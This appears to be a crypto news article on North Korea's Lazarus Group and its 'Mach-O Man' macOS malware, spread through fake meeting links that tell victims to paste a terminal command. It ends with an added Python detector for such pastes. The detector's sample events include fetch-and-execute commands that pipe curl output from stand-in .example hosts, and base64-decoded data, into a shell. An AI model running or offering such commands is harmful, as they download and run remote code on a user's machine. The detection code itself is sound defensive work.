April 23, 2026 ChainGPT

North Korea's Lazarus unleashes 'Mach-O Man' macOS malware to steal crypto via fake meeting links

North Korea’s Lazarus Group ramps up attacks with “Mach-O Man” macOS malware, according to CertiK

North Korea’s state-backed hacking collective Lazarus Group has rolled out a new macOS malware campaign dubbed “Mach-O Man,” and security researchers warn it is turning routine business communications into a fast lane for credential theft and fund extraction.

What’s happening

- CertiK researcher Natalie Newson told CoinDesk that Lazarus, which security firms estimate has stolen about $6.7 billion since 2017, is actively targeting fintech firms, crypto companies and high-value executives. In just the past two weeks the group allegedly siphoned more than $500 million in attacks tied to the Drift and KelpDAO incidents.
- Newson said the tempo of attacks is what makes Lazarus especially dangerous: “KelpDAO, Drift, and now a new macOS malware kit, all within the same month. This isn’t random hacking; it’s a state-directed financial operation running at a scale and speed typical of institutions.” She urged the crypto industry to treat Lazarus the way banks treat nation-state cyber actors: as a constant, well-funded threat.

How Mach-O Man works

- Mach-O Man is a modular macOS malware kit developed by Lazarus’s Chollima division. It is built from native Mach-O binaries tailored to the Apple environments in which crypto and fintech teams often work. CertiK says other cybercriminal groups have already adopted the kit.
- The campaign relies primarily on a social-engineering technique researchers call “ClickFix.” Attackers send executives urgent meeting invites via Telegram for Zoom, Microsoft Teams or Google Meet. The meeting link leads to a convincing fake site that claims there is a connection problem and instructs the victim to paste a single command into the Mac terminal to “fix” it.
- These fake verification pages sometimes impersonate Cloudflare or sit on hijacked DeFi project domains; guided keyboard shortcuts lead victims to run the harmful command themselves.
- Once the command executes, attackers gain immediate access to corporate systems, cloud SaaS accounts and financial resources. Newson warns that the pages and instructions look legitimate, which often lets the attack bypass traditional security controls.
- Several variants exist, and by the time victims discover a breach the malware may already have erased itself, making attribution and remediation more difficult. “They likely don’t know it yet,” Newson said. “If they do, they probably can’t identify which variant affected them.”

Other voices

- Mauro Eldritch, founder of threat-intelligence firm BCA Ltd., described the delivery vector and how the spoofed meeting flow lures targets into running the command.
- Security researcher Vladimir S. reported on X that Lazarus actors have already used the tactic to hijack DeFi domains and display fake Cloudflare-style prompts instructing administrators to run terminal commands.

Why this matters for crypto

- The attack blends targeted social engineering with macOS-native tooling, letting highly motivated, well-funded operators pivot quickly from initial access to full control over financial resources. For crypto firms, many of which rely on remote collaboration tools, cloud services and command-line workflows, the technique poses an acute operational risk.

Practical takeaways

- Security teams and executives should treat any unsolicited instruction to run terminal commands with extreme skepticism.
- Reinforce training on social-engineering risks, verify meeting invites through a secondary channel, and enforce strict controls on administrative and cloud credential use.
- Consider additional endpoint monitoring for macOS environments, and harden the process for domain and DNS changes to prevent hijacks.

Bottom line: Mach-O Man demonstrates how state-directed groups are weaponizing everyday workflows to drain wallets and access corporate infrastructure. CertiK’s warning underscores that Lazarus is not a sporadic nuisance but a sustained, institutional-grade threat the crypto sector must defend against.
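As an added illustration of the "additional endpoint monitoring" takeaway (example code written for this page, not part of the article or of CertiK's research), the script below scans constructed macOS process-execution events for the pattern a ClickFix paste produces: a single command typed into a terminal app that fetches or decodes remote content and hands it straight to a shell. The (parent app, command line) record shape, the application names and the sample command lines with .example domains are all assumptions made for the demonstration.

```python
import re

# Constructed (parent application, command line) process events; the record
# shape and the domains are assumptions for illustration, not real telemetry.
SAMPLE_EVENTS = [
    ("Terminal", "ls -la ~/Projects"),
    ("Terminal", "curl -fsSL https://meet-fix.example/verify.sh | bash"),
    ("iTerm2", "echo aGVsbG8= | base64 -d | sh"),
    ("Terminal", "git pull origin main"),
    ("Terminal", '/bin/zsh -c "$(curl -s https://cf-check.example/fix)"'),
    ("Terminal", "nohup osascript -e 'display dialog \"fix\"' &"),
]

# Interactive terminal apps: a ClickFix lure asks the victim to paste here.
TERMINAL_APPS = {"Terminal", "iTerm2"}

# Heuristics for "one pasted command that fetches code and runs it at once".
SHELL = r"(?:sudo\s+)?(?:/bin/)?(?:sh|bash|zsh)\b"
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*" + SHELL)
DECODE_TO_SHELL = re.compile(r"\bbase64\s+(?:-d|--decode|-D)\b[^|]*\|\s*" + SHELL)
SUBST_FETCH = re.compile(r"\$\(\s*(?:curl|wget)\b")


def classify(cmdline):
    """Return the names of every heuristic the command line matches."""
    hits = []
    if PIPE_TO_SHELL.search(cmdline):
        hits.append("fetch_piped_to_shell")
    if DECODE_TO_SHELL.search(cmdline):
        hits.append("base64_decode_to_shell")
    if SUBST_FETCH.search(cmdline):
        hits.append("fetch_in_command_substitution")
    return hits


def scan(events):
    """Return the events worth alerting on: a matching command whose parent
    is an interactive terminal app, i.e. something a person typed or pasted."""
    flagged = []
    for parent, cmdline in events:
        hits = classify(cmdline)
        if hits and parent in TERMINAL_APPS:
            flagged.append({"parent": parent, "cmdline": cmdline, "hits": hits})
    return flagged


if __name__ == "__main__":
    for event in scan(SAMPLE_EVENTS):
        print(f"[ALERT] {event['parent']}: {event['cmdline']}  <- {', '.join(event['hits'])}")
```

In production the same heuristics would run over an EDR's process-creation feed with the parent-process check kept, since the point of the lure is to have the user, not a browser or installer, run the command.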